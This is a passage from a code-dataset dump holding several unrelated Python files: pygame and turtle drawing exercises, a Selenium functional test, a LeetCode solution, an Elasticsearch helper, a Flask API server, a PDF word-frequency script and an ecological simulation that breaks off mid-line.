Challenge\n\n\n\n","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"450369503","text":"import pygame\r\nimport numpy as np\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nLIGHTBLUE = (0, 255, 255)\r\nYELLOW = (255, 255, 0)\r\nBROWN = (65, 25, 0)\r\nPINK = (243, 0, 191)\r\nLIGHTBLUE_LAS_1 = (111,205,252)\r\nLIGHTBLUE_LAS_2 = (4,138,205)\r\nGREEN_BLACK = (4,138,1)\r\nPINK_LIGHT = (254,169,163)\r\n\r\ndef draw_foliage(surface, color, x_0, y_0, radius, num):\r\n abs_x = x_0\r\n abs_y = y_0\r\n for i in range(num//2 + 2):\r\n pygame.draw.circle(surface, color, (x_0 - 20, y_0 + 20), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 - 20, y_0 + 20), radius, 1)\r\n x_0 += 10\r\n x_0 = abs_x\r\n y_0 = abs_y\r\n for i in range(num // 2):\r\n pygame.draw.circle(surface, color, (x_0 - 10, y_0), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 - 10, y_0), radius, 1)\r\n x_0 += 10\r\n x_0 = abs_x\r\n y_0 = abs_y\r\n for i in range(1):\r\n pygame.draw.circle(surface, color, (x_0, y_0 - 20), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0, y_0 - 20), radius, 1)\r\n x_0 += 10\r\n\r\ndef draw_tree(surface, x, y, width, height, color, radius_leave, num_leaves):\r\n pygame.draw.rect(surface, BLACK, (x, y, width, height))\r\n x_0 = x + 10\r\n y_0 = y - 10\r\n draw_foliage(surface, color, x_0, y_0, radius_leave, num_leaves)\r\n\r\ndef draw_cloud(surface, x_0, y_0, radius):\r\n abs_x = x_0\r\n abs_y = y_0\r\n for i in range(4):\r\n pygame.draw.circle(surface, WHITE, (x_0 - radius, y_0), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 - radius, y_0), radius, 1)\r\n x_0 += radius\r\n x_0 = abs_x\r\n for i in range(2):\r\n pygame.draw.circle(surface, WHITE, (x_0 , y_0 - radius), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 , y_0 - radius), radius, 1)\r\n x_0 += radius\r\n\r\ndef draw_house(surface, x_0, y_0, width, height):\r\n pygame.draw.rect(screen, BROWN, (x_0, y_0, width, height))\r\n pygame.draw.rect(screen, LIGHTBLUE_LAS_2, (x_0 + width // 3, y_0 + height // 3, width // 3, height // 3))\r\n pygame.draw.polygon(screen, PINK, [(x_0, y_0), (x_0 + width // 2, y_0 - width // 2), (x_0 + width, y_0)])\r\n\r\n\r\ndef draw_sun(surface, x_0, y_0, color, radius):\r\n phi = 0\r\n for i in range(360):\r\n pygame.draw.polygon(surface, color, ((x_0 + 5 - int(radius*np.cos(2 *np.pi / 3 - phi)),\r\n y_0 + 5 + int(radius*np.sin(2*np.pi/3 - phi))),\r\n (x_0 + 5 + int(radius*np.sin(phi) ),\r\n y_0 + 5 - int(radius*np.cos(phi)) //4),\r\n (x_0 + 5 + int(radius*np.cos(2*np.pi/3 + phi)),\r\n y_0 + 5 + int(radius*np.sin(2*np.pi/3 + phi)))))\r\n phi += 10\r\n\r\n\r\nscreen = pygame.display.set_mode((800, 800))\r\nscreen.fill(WHITE)\r\n\r\n\r\n\r\npygame.draw.rect(screen, GREEN, (0, 400, 800, 400))\r\npygame.draw.rect(screen, LIGHTBLUE_LAS_1, (0, 0, 800, 400))\r\n\r\ndraw_house(screen, 100, 420, 150, 150)\r\ndraw_house(screen, 400, 330, 100, 100)\r\n\r\ndraw_tree(screen, 590, 380, 15, 80, GREEN_BLACK, 25, 6)\r\ndraw_tree(screen, 330, 450, 20, 150, GREEN_BLACK, 25, 6)\r\ndraw_cloud(screen, 400, 200, 30)\r\ndraw_cloud(screen, 600, 250, 20)\r\ndraw_cloud(screen, 200, 300, 34)\r\ndraw_cloud(screen, 600, 150, 15)\r\ndraw_sun(screen, 100, 150, PINK_LIGHT, 70)\r\n\r\n\r\n\r\npygame.init()\r\nFPS = 30\r\n\r\npygame.display.flip()\r\n\r\npygame.display.update()\r\nclock = pygame.time.Clock()\r\n\r\n\r\nfinished = False\r\nwhile not finished:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finished = True\r\n\r\n\r\n\r\npygame.quit()","sub_path":"28.09task3image2 Trofimov Ivan.py","file_name":"28.09task3image2 Trofimov Ivan.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"253846488","text":"# PREUD'HOMME BONTOUX Geoffrey - PeiP 12 - 2014/2015\n# TP n°5 donné le 10/10/2014 - Mouvement brownien\n# http://www.fil.univ-lille1.fr/~wegrzyno/portail/Info/Doc/HTML/tp_itcond_tortue.html\n\nfrom turtle import *\nfrom random import randint\n\n# Constantes\nCOTE = 400\n\n# Fonctions\ndef tortue_sortie(cote):\n \"\"\"\n Indique si la tortue est en dehors du carré de coté 'cote' centré en\n l'origine.\n\n CU : cote entier strictement positif \n\n Exemple :\n >>> tortue_sortie(400)\n \"\"\"\n assert(type(cote) is int and cote > 0), \"cote doit être un entier \\\nstrictement positif\"\n\n return not (xcor() >= -cote/2 and xcor() <= cote/2 and \\\n ycor() >= -cote/2 and ycor() <= cote/2)\n\ndef carre(cote):\n \"\"\"\n Dessine un carré bleu de coté 'cote' centré en l'origine.\n\n CU : cote entier strictement positif\n\n Exemple :\n >>> carre(50)\n \"\"\"\n assert(type(cote) is int and cote > 0), \"cote doit être un entier \\\nstrictement positif\"\n\n pencolor(\"blue\")\n penup()\n goto(-cote/2, -cote/2)\n pendown()\n for i in range(0, 4):\n forward(cote)\n left(90)\n\ndef mouvement_brownien():\n \"\"\"\n Applique à la tortue une étape du mouvement brownien.\n\n Exemple :\n >>> mouvement_brownien()\n \"\"\"\n left(randint(0, 359))\n forward(randint(10, 30))\n\n\n# Mise en place\ncarre(COTE)\npenup()\npencolor(\"green\")\ngoto(0, 0)\npendown()\n\n# Mouvement\nwhile not tortue_sortie(COTE):\n mouvement_brownien()\n","sub_path":"S1/TP 5/brownien.py","file_name":"brownien.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"331334423","text":"from django.test import LiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import WebDriverException\nimport time\n\nMAX_WAIT = 10\n\nclass NewVisitorTest(LiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Firefox()\n\n def tearDown(self):\n self.browser.quit()\n\n def wait_for_elements_by_tag(self, tag_name):\n start_time = time.time()\n while True:\n try:\n elements = self.browser.find_elements_by_tag_name(tag_name)\n return elements\n except (AssertionError, WebDriverException) as e:\n if time.time() - start_time > MAX_WAIT:\n raise e\n time.sleep(0.5)\n\n def test_user_can_create_poll(self):\n\n # Susan is wasting time on the internet and accidentally opens the\n # home page of Friends Vote\n self.browser.get(self.live_server_url)\n\n ## Sanity check\n # She sees that the page title and header mention friends and voting\n self.assertEqual('Friends Vote', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('Friends Vote', header_text)\n\n # There is also an accessibly labelled text input prompting her to create\n # a new question for her friends to vote on\n question_label = self.browser.find_elements_by_tag_name('label')[0].text\n self.assertEqual(question_label, 'Enter a question for your friends to vote on:')\n\n # as well as two other inputs below that, prompting her for possible\n # answers to her question\n answer_label_1 = self.browser.find_elements_by_tag_name('label')[1].text\n self.assertEqual(answer_label_1, 'Answer 1:')\n answer_label_2 = self.browser.find_elements_by_tag_name('label')[2].text\n self.assertEqual(answer_label_2, 'Answer 2:')\n\n # She types \"What pet should I get?\" into the text box\n question_input = self.browser.find_element_by_id('question')\n question_input.send_keys('What pet should I get?')\n\n # and creates two possible answers by entering \"a cat\" and \"a dog\" into\n # the two answer inputs\n answer_input_1 = self.browser.find_element_by_id('answer-1')\n answer_input_1.send_keys('a cat')\n answer_input_2 = self.browser.find_element_by_id('answer-2')\n answer_input_2.send_keys('a dog')\n\n # Then she presses enter\n answer_input_2.send_keys(Keys.ENTER)\n\n # The page updates, and now contains her question\n question_heading = self.wait_for_elements_by_tag('h2')[0]\n self.assertEquals(question_heading.text, 'What pet should I get?')\n\n # The page also contains her answers as radio inputs\n answer_input_1 = self.wait_for_elements_by_tag('input')[0]\n self.assertEquals(answer_input_1.type, 'radio')\n self.assertEqual(answer_input_1.text, 'a cat')\n answer_input_2 = self.wait_for_elements_by_tag('input')[1]\n self.assertEquals(answer_input_2.type, 'radio')\n self.assertEqual(answer_input_2.text, 'a dog')\n\n # She chooses the second answer, \"a cat\", and presses enter again\n\n # The page updates again, and displays her question in a heading\n\n # as well as each of the possible answers as list items\n\n # Next to each answer is a vote count\n\n # and a vote percentage\n\n self.fail('Expected failure: Finish the test!')\n\n # def test_can_create_and_submit_more_answer_options(self):\n # self.fail('Expected failure: Finish the test!')\n # # She sees that there is a button for adding more answers\n # # When she clicks it, a third text box appears\n # # She types \"a lizard\" into the third box\n\n ## URL flow\n\n ## What if she has 5 answer boxes but only 3 have text when she submits?\n ## What if she doesn't submit any text, or only text for one answer?\n ## What if she tries to vote/submit without choosing an answer (front end and back end)\n\n## new class - others can vote on a poll\n# Susan shares her voting URL...\n\n## new class - others can view poll results\n# Susan shares her results URL...","sub_path":"functional_tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162414699","text":"'''\nReshape the Matrix\nEasy\n\nIn MATLAB, there is a handy function called reshape which can reshape an m x n matrix into a new one with a different size r x c keeping its original data.\n\nYou are given an m x n matrix mat and two integers r and c representing the number of rows and the number of columns of the wanted reshaped matrix.\n\nThe reshaped matrix should be filled with all the elements of the original matrix in the same row-traversing order as they were.\n\nIf the reshape operation with given parameters is possible and legal, output the new reshaped matrix; Otherwise, output the original matrix.\n\n \n\nExample 1:\n\nInput: mat = [[1,2],[3,4]], r = 1, c = 4\nOutput: [[1,2,3,4]]\n\nExample 2:\n\nInput: mat = [[1,2],[3,4]], r = 2, c = 4\nOutput: [[1,2],[3,4]]\n'''\n\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n vals = []\n \n for row in mat:\n vals.extend(row)\n \n if r * c != len(vals):\n return mat\n \n elif r == 1:\n return [vals]\n \n res = []\n \n for i in range(r):\n t = vals[c*i:(c*i)+c]\n res.append(t)\n \n return res\n","sub_path":"leetcode/Reshape_the_Matrix.py","file_name":"Reshape_the_Matrix.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"298607651","text":"from unittest import TestCase\n\nfrom simpleblockchain.blockchain import *\nfrom simpleblockchain.crypto import *\n\n\nclass TestBlockSerialize(TestCase):\n def test_serialize(self):\n privkey = PrivateKey.generate()\n pubkey = privkey.get_public()\n tx = Transaction(b\"\\x00\"*32, [Output(pubkey, 12345)])\n tx = privkey.sign(tx)\n block = Block(1, 2, 3, 4, [tx])\n\n deserialized = Block.deserialize(block.serialize())\n assert(pubkey.verify(block.transactions[0]))\n assert(pubkey.verify(deserialized.transactions[0]))\n assert(block == deserialized)\n","sub_path":"simpleblockchain/test_block.py","file_name":"test_block.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199793423","text":"from elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\n\nclass Elastic(object):\n def __init__(self, app=None, db=None, *args, **kwargs):\n if app:\n self.object = (\n Elasticsearch([app.config[\"ELASTICSEARCH_URL\"]])\n if app.config[\"ELASTICSEARCH_URL\"]\n else None\n )\n\n self.object = None\n self.db = db\n\n def init_app(self, app, db):\n self.object = (\n Elasticsearch([app.config[\"ELASTICSEARCH_URL\"]])\n if app.config[\"ELASTICSEARCH_URL\"]\n else None\n )\n self.db = db\n self.bulk_queue = []\n\n def add_to_bulk_queue(self, index, model_object, operation):\n if operation == 'delete':\n entry = {\n \"_op_type\": operation,\n \"_index\": index,\n \"_type\": index,\n \"_id\": model_object.id\n }\n elif operation == 'index':\n entry = {\n \"_op_type\": operation,\n \"_index\": index,\n \"_type\": index,\n \"_id\": model_object.id,\n \"_source\": self._create_payload(model_object)\n }\n else:\n return\n \n self.bulk_queue.append(entry)\n\n def clear_bulk_queue(self):\n self.bulk_queue = []\n \n def perform_bulk(self):\n bulk(self.object, self.bulk_queue)\n self.clear_bulk_queue()\n\n def _create_payload(self, model_object):\n payload = dict()\n for field in model_object.__searchable__:\n if isinstance(field, str):\n payload[field] = getattr(model_object, field)\n if isinstance(field, tuple):\n subfields = field[1]\n field = field[0]\n if not isinstance(getattr(model_object, field), list):\n if len(subfields) == 1:\n payload[field] = getattr(\n getattr(model_object, field), subfields[0]\n )\n else:\n payload[field] = dict()\n for subfield in subfields:\n payload[field][subfield] = getattr(\n getattr(model_object, field), subfield\n )\n else:\n payload[field] = list()\n for sub_model_object in getattr(model_object, field):\n subfield_group = dict()\n for subfield in subfields:\n subfield_group[subfield] = getattr(\n sub_model_object, subfield\n )\n payload[field].append(subfield_group)\n return payload\n\n def add_to_index(self, index, model_object):\n if not self.object:\n return\n # payload = dict()\n # for field in model.__searchable__:\n # if \".\" in field:\n # [field, subfield] = field.split(\".\")\n # field_attr = getattr(model, field)\n # if isinstance(field_attr, self.db.Model):\n # payload[field] = getattr(field_attr, subfield)\n # elif isinstance(field_attr, list):\n # payload[field] = list()\n # for i in field_attr:\n # if isinstance(i, self.db.Model):\n # subfield_attr = getattr(i, subfield)\n # payload[field].append(subfield_attr)\n\n # else:\n # payload[field] = getattr(model, field)\n payload = self._create_payload(model_object)\n self.object.index(index=index, doc_type=index, id=model_object.id, body=payload)\n\n def remove_from_index(self, index, model_object):\n if not self.object:\n return\n self.object.delete(index=index, doc_type=index, id=model_object.id)\n\n def query_index(self, index, query, page, per_page):\n if not self.object:\n return [], 0\n search = self.object.search(\n index=index,\n body={\n \"query\": {\"multi_match\": {\"query\": query, \"fields\": [\"*\"]}},\n \"from\": (page - 1) * per_page,\n \"size\": per_page,\n },\n )\n # ids = [int(hit['_id']) for hit in search['hits']['hits']]\n return search\n","sub_path":"app/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"653119959","text":"from flask import Flask, jsonify, make_response, send_file\nfrom pymongo import MongoClient\nfrom .db_connectors import connectors\nfrom furl import furl\nfrom flask_cors import CORS\nimport io\n\n\nDB_NAME = 'cortex-db'\n\n\ndef run_api_server(host='localhost', port='5000', database_url='mongodb://localhost:27017'):\n \"\"\"\n Initializes a REST API endpoint that connects to the given database and serves data from it\n\n :param host: The host on which the API runs\n :param port: The port on which the API runs\n :param database_url: The url (with scheme) of the database from which the API serves data \n\n \"\"\"\n server = Flask(__name__)\n CORS(server, resources={r\"/*\": {\"origins\": \"*\"}})\n\n db = furl(database_url)\n if db.scheme not in connectors:\n raise Exception(f'No connector for the {db.scheme} scheme was found. Make sure it is defined and located in the db_connectors package')\n\n connector = connectors[db.scheme](db_url = database_url)\n \n\n @server.route('/users')\n def get_users():\n return make_response(jsonify(connector.get_all_users()), 200)\n\n @server.route('/users/')\n def get_specific_user(id):\n result = connector.get_user(id)\n if not result:\n return make_response('User not found\\n', 404)\n return make_response(jsonify(result), 200)\n\n @server.route('/users//snapshots')\n def get_user_snapshots(id):\n result = connector.get_user_snapshots(id)\n if not result:\n return make_response('User not found\\n', 404)\n return make_response(jsonify(result), 200)\n\n @server.route('/users//snapshots/')\n def get_snapshot(user_id, snap_id):\n result = connector.get_snapshot(user_id, snap_id)\n if not result:\n return make_response('Snapshot not found\\n', 404)\n\n return make_response(jsonify(result), 200)\n\n @server.route('/users//snapshots//')\n def get_result(user_id, snap_id, result_name):\n result = connector.get_result(user_id, snap_id, result_name)\n if not result:\n return make_response('Snapshot result not found\\n', 404)\n return make_response(jsonify(result), 200)\n\n @server.route('/users//snapshots///data')\n def get_result_data(user_id, snap_id, result_name):\n result = connector.get_result(user_id, snap_id, result_name)\n if not result or 'data' not in result:\n return make_response('Snapshot result not found or has no data\\n', 404)\n return send_file(result['data'], mimetype='image/png')\n\n server.run(host=host, port=port)\n","sub_path":"cortex/api/api_server.py","file_name":"api_server.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"262806150","text":"import csv\r\nimport importlib\r\nimport sys\r\nimport pandas as pd\r\n\r\nimportlib.reload(sys)\r\n\r\nimport os.path\r\nfrom pdfminer.pdfparser import PDFParser, PDFDocument\r\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\r\nfrom pdfminer.converter import PDFPageAggregator\r\nfrom pdfminer.layout import LTTextBoxHorizontal, LAParams\r\nfrom pdfminer.pdfinterp import PDFTextExtractionNotAllowed\r\n\r\n\r\n# text_path = r'photo-words.pdf'\r\n\r\n# 判断文件后缀,只读取.pdf格式的文件\r\ndef isPdf(s, *endString):\r\n array = map(s.endswith, endString)\r\n if True in array:\r\n return True\r\n else:\r\n return False\r\n\r\n# 从文件夹中批量读取文件,path是文件路径\r\ndef readFile(path):\r\n fileList = os.listdir(path)\r\n for filename in fileList:\r\n # 先判断文件格式\r\n if isPdf(filename, '.pdf'):\r\n # 建立文件绝对路径\r\n filepath = path + '/' + filename\r\n parse(filepath)\r\n\r\ndef parse(filepath):\r\n '''解析PDF文本,并保存到TXT文件中'''\r\n fp = open(filepath, 'rb')\r\n parser = PDFParser(fp)\r\n doc = PDFDocument()\r\n parser.set_document(doc)\r\n doc.set_parser(parser)\r\n doc.initialize()\r\n\r\n # 检测文档是否提供txt转换,不提供就忽略\r\n if not doc.is_extractable:\r\n raise PDFTextExtractionNotAllowed\r\n else:\r\n rsrcmgr = PDFResourceManager()\r\n laparams = LAParams()\r\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\r\n interpreter = PDFPageInterpreter(rsrcmgr, device)\r\n\r\n # 循环遍历列表,每次处理一个page内容\r\n for page in doc.get_pages():\r\n interpreter.process_page(page)\r\n layout = device.get_result()\r\n for x in layout:\r\n if (isinstance(x, LTTextBoxHorizontal)):\r\n with open(r'pdf_data.txt', 'a', encoding='utf-8_sig') as f:\r\n results = x.get_text()\r\n f.write(results + \"\\n\")\r\n'''\r\n统计分析:对上一阶段的txt文件进行统计和分析,计算每个单词出现的次数,写入csv文件\r\n'''\r\ndef analysis():\r\n # 从txt文件中读取单词并转换为列表\r\n f = open('pdf_data.txt', encoding='utf-8_sig')\r\n voca = f.read().split(' ')\r\n f.close()\r\n\r\n # 打开csv文件,并写入\r\n csv_file = open('pdf_data.csv', 'w', newline='', encoding='utf-8_sig')\r\n csv_write = csv.writer(csv_file)\r\n csv_write.writerow(['单词','词频' ])\r\n # print(voca)\r\n while len(voca) is not 0:\r\n word = voca[0]\r\n cnt = 0\r\n while word in voca: # 计算单词w的出现次数\r\n voca.remove(word) # 删除已经统计过的单词\r\n cnt += 1\r\n if(len(word) > 3):\r\n csv_write.writerow([word, cnt]) # 写入csv文件\r\n csv_file.close()\r\n\r\n# 根据词频进行排序,同样词频则按字幕序\r\ndef sortTime():\r\n df = pd.read_csv('pdf_data.csv', encoding='utf-8_sig')\r\n df = df.sort_values(['词频', '单词'], ascending=False)\r\n # print(df)\r\n df.to_csv('pdf_data.csv', header=True, index=False, encoding='utf-8_sig')\r\n\r\n\r\nif __name__ == '__main__':\r\n path = 'paper' # 存放论文文件的文件夹路径\r\n readFile(path)\r\n analysis()\r\n sortTime()\r\n\r\n\r\n","sub_path":"parsePDF.py","file_name":"parsePDF.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"69334040","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nimport os\n\n__version_str__ = \"1.0.0\"\n\n\nclass lazy_cythonize(list):\n def __init__(self, callback):\n self._list, self.callback = None, callback\n def c_list(self):\n if self._list is None: self._list = self.callback()\n return self._list\n def __iter__(self):\n for e in self.c_list(): yield e\n def __getitem__(self, ii): return self.c_list()[ii]\n def __len__(self): return len(self.c_list())\n\n\ndef extensions():\n import numpy\n from Cython.Build import cythonize\n\n # fig_path = \"figtree\"\n root, _ = os.path.split(os.path.realpath(__file__))\n fig_path = os.path.join(root, \"figtree\")\n fig_src_path = os.path.join(fig_path, \"src\")\n fig_include_path = os.path.join(fig_path, \"include\")\n ann_path = os.path.join(fig_path, \"external\", \"ann_1.1.1\")\n ann_src_path = os.path.join(ann_path, \"src\")\n ann_include_path = os.path.join(ann_path, \"include\")\n fig_sources = [os.path.join(fig_src_path, f) for f in os.listdir(fig_src_path) if f[-4:] == \".cpp\"]\n ann_sources = [os.path.join(ann_src_path, f) for f in os.listdir(ann_src_path) if f[-4:] == \".cpp\"]\n\n numpy_include_dir = numpy.get_include()\n figtree_module = Extension(\n \"figtree\",\n [\n os.path.join(root, \"figtree.pyx\"),\n *fig_sources,\n *ann_sources\n ],\n language=\"c++\",\n include_dirs=[\n ann_src_path,\n ann_include_path,\n fig_include_path,\n numpy_include_dir],\n )\n return cythonize([figtree_module])\n\n\nsetup(\n name=\"Figtree\",\n version=__version_str__,\n description=\"An implementation of the Fast Gauss Transform\",\n author=\"Vlad Morariu\",\n url=\"https://github.com/mikeswhitney33/figtree\",\n ext_modules=lazy_cythonize(extensions),\n requires=['numpy','Cython'],\n setup_requires=['numpy', 'Cython']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634551021","text":"#!/usr/bin/env python3\n\"\"\" This is taken from the w3c_validator package, which would not install for some reason. \"\"\"\nimport requests\nimport logging\nimport tempfile\nimport os\n\nLOGGER = logging.getLogger(__name__)\nHTML_VALIDATOR_URL = \"http://validator.w3.org/nu/?out=json\"\n\n\ndef validate(filename):\n \"\"\"\n Validate file and return JSON result as dictionary.\n \"filename\" can be a file name or an HTTP URL.\n Return \"\" if the validator does not return valid JSON.\n Raise OSError if curl command returns an error status.\n \"\"\"\n # is_css = filename.endswith(\".css\")\n\n is_remote = filename.startswith(\"http://\") or filename.startswith(\n \"https://\")\n with tempfile.TemporaryFile() if is_remote else open(\n filename, \"rb\") as f:\n\n if is_remote:\n r = requests.get(filename, verify=False)\n f.write(r.content)\n f.seek(0)\n\n # if is_css:\n # cmd = (\n # \"curl -sF \\\"file=@%s;type=text/css\\\" -F output=json -F warning=0 %s\"\n # % (quoted_filename, CSS_VALIDATOR_URL))\n # _ = cmd\n # else:\n r = requests.post(\n HTML_VALIDATOR_URL,\n files={\"file\": (filename, f, \"text/html\")},\n data={\n \"out\": \"json\",\n \"showsource\": \"yes\",\n },\n verify=False)\n\n return r.json()\n\n\nfailures = 0\nfile_names = list(os.listdir(\"../\"))\nfile_names.sort()\nfor file_name in file_names:\n if file_name.endswith(\".html\") and file_name[0] in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n print(\"Processing \" + file_name)\n messages = validate(\"../\" + file_name)[\"messages\"]\n for m in messages:\n if not (m[\"message\"].startswith(\"An “img” element must have an “alt” attribute\")):\n failures += 1\n # Note that the line in the .content.html file will be about 74 lines earlier than the printed number\n # because of the extra ones added during rendering.\n print(\"Type: %(type)s, Line: %(lastLine)d, Description: %(message)s\" % m)\n\nif failures == 0:\n print(\"All files passed\")\nelse:\n print(\"{} errors\".format(failures))\n","sub_path":"tests/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"176483908","text":"import random as rnd\nimport tkinter as tk\nimport numpy as np\nimport math as math\nimport matplotlib.pyplot as plt\nfrom nlmpy import nlmpy\nfrom PIL import Image\nimport csv\n\nclass Visual:\n '''This class arranges the visual output.'''\n def __init__(self, max_x, max_y):\n '''Initialize the visual class'''\n self.zoom = 10\n self.max_x = max_x\n self.max_y = max_y\n self.root = tk.Tk()\n self.canvas = tk.Canvas(self.root,\n width=self.max_x * self.zoom,\n height=self.max_y * self.zoom)\n self.canvas.pack()\n self.canvas.config(background='white')\n self.squares = np.empty((self.max_x, self.max_y), dtype=object)\n self.initialize_squares()\n\n def create_individual(self, x, y):\n '''Creates circle for individual'''\n color = \"black\"\n radius = 0.15\n return self.canvas.create_oval((x - radius) * self.zoom,\n (y - radius) * self.zoom,\n (x + radius) * self.zoom,\n (y + radius) * self.zoom,\n outline=color,\n fill=color)\n\n def move_drawing(self, drawing, x, y):\n radius = 0.15\n self.canvas.coords(drawing, (x - radius) * self.zoom,\n (y - radius) * self.zoom,\n (x + radius) * self.zoom,\n (y + radius) * self.zoom)\n\n def color_square(self, resources, x, y):\n '''Changes the color of the square'''\n color = np.clip(resources / 100, 0, 1)\n green = int(255 * color)\n red = 255 - green\n blue = 0\n rgb = red, green, blue\n hex_code = '#%02x%02x%02x' % rgb\n self.canvas.itemconfigure(self.squares[x, y], fill=str(hex_code))\n\n def initialize_squares(self):\n '''returns a square (drawing object)'''\n for x in range(self.max_x):\n for y in range(self.max_y):\n self.squares[x, y] = self.canvas.create_rectangle(self.zoom * x,\n self.zoom * y,\n self.zoom * x + self.zoom,\n self.zoom * y + self.zoom,\n outline='black',\n fill='black')\n\nclass Individual:\n ''' class that regulates living individuals and their properties'''\n def __init__(self, x, y, mass, step_mean, diversion, angle, meta):\n '''initialisation'''\n self.x = x\n self.y = y\n self.age = 0\n self.mass = mass\n self.metabolic_cost = (0.14 * self.mass ** 0.751) * (3600 - 150)\n self.time_move = 150\n self.velocity = 0.30 * self.mass ** 0.29\n self.movement_cost = 0.17 * self.mass ** 0.75 + 3.4 * self.mass\n self.transport_cost = cell_size * (0.56 * self.mass ** 0.46 + 11.3 * self.mass ** 0.72)\n self.ingestion = (2 * self.mass ** 0.8) * (3600 - self.time_move)\n self.hourly_cost = self.metabolic_cost + (10 * self.transport_cost)\n self.diversion = diversion\n self.step_mean = step_mean\n self.angle = rnd.uniform(0, 2 * math.pi)\n self.resources = self.hourly_cost\n self.reproductive_age = rnd.randint(336, 504)\n self.cost = (0.158 * mass ** 0.92 * (7 * 10 ** 6)) / 15 + self.hourly_cost\n self.alive = True\n if meta.movie:\n self.drawing = meta.visual.create_individual(x, y)\n\n def move(self):\n '''relocates individual'''\n step = np.random.poisson(self.step_mean)\n self.resources -= self.metabolic_cost\n if self.resources <= 0:\n self.die()\n\n else:\n self.angle += rnd.uniform(-self.diversion, self.diversion)\n future_pos_x = self.x + step * math.cos(self.angle)\n self.y += step * math.sin(self.angle)\n meta.list_x.remove(self.x)\n self.x = future_pos_x if 0 <= future_pos_x < meta.max_x else 0 - future_pos_x if future_pos_x < 0 \\\n else meta.max_x - (future_pos_x - meta.max_x)\n self.y %= max_y\n self.resources -= self.transport_cost * step\n meta.list_x.append(self.x)\n if self.resources <= 0:\n self.die()\n\n if meta.movie:\n meta.visual.move_drawing(self.drawing, self.x, self.y)\n\n def die(self):\n '''Removes individual from the population'''\n self.alive = False\n meta.list_diversion.remove(self.diversion)\n meta.list_step.remove(self.step_mean)\n meta.list_x.remove(self.x)\n if meta.movie:\n meta.visual.canvas.delete(self.drawing)\n\n def reproduction(self):\n '''Introduction of new individuals through reproduction'''\n if self.resources // self.cost >= 0:\n for young in range(np.random.poisson(self.resources // self.cost)):\n step_mean = rnd.uniform(step_min, step_max) if np.random.rand() < mutation_rate else self.step_mean\n diversion = rnd.uniform(div_min, div_max) if np.random.rand() < mutation_rate else self.diversion\n angle = rnd.uniform(0, 2 * math.pi)\n meta.population.append(Individual(self.x, self.y, self.mass, step_mean, diversion, angle, meta))\n meta.list_diversion.append(diversion)\n meta.list_step.append(step_mean)\n meta.list_x.append(self.x)\n\n self.die()\n\nclass Metapopulation:\n '''contains the whole population and regulates the daily life'''\n def __init__(self, max_x, max_y):\n self.population = []\n self.max_x = max_x\n self.max_y = max_y\n p = suitable_habitat\n n0 = 1 - p\n continuous_env = nlmpy.mpd(nRow=self.max_y, nCol=self.max_x, h=autocorrelation)\n self.environment = carrying_capacity * nlmpy.classifyArray(continuous_env, [n0, p])\n self.pop_size = []\n self.list_step = []\n self.list_diversion = []\n self.list_resources = []\n self.direction_seasonality = 1\n self.seasonality = [0, int(self.max_x / 2)]\n self.mean_step = []\n self.mean_diversion = []\n self.mean_resources = []\n self.mean_regrowth = []\n self.list_regrowth = []\n self.list_x = []\n self.mean_x = []\n\n self.movie = False\n if self.movie:\n self.visual = Visual(self.max_x, self.max_y)\n\n for x_coord in range(self.max_x):\n for y_coord in range(self.max_y):\n if self.environment[x_coord][y_coord] > 0:\n self.list_resources.append([x_coord, y_coord])\n\n self.initialize_pop()\n\n def initialize_pop(self):\n ''' initialize the population'''\n start_pop = start_population\n\n for n in range(start_pop):\n coordinates = rnd.choice(self.list_resources)\n x_start = coordinates[0]\n y_start = coordinates[1]\n step_mean = rnd.uniform(step_min, step_max)\n diversion = rnd.uniform(div_min, div_max)\n angle = rnd.uniform(0, 2 * 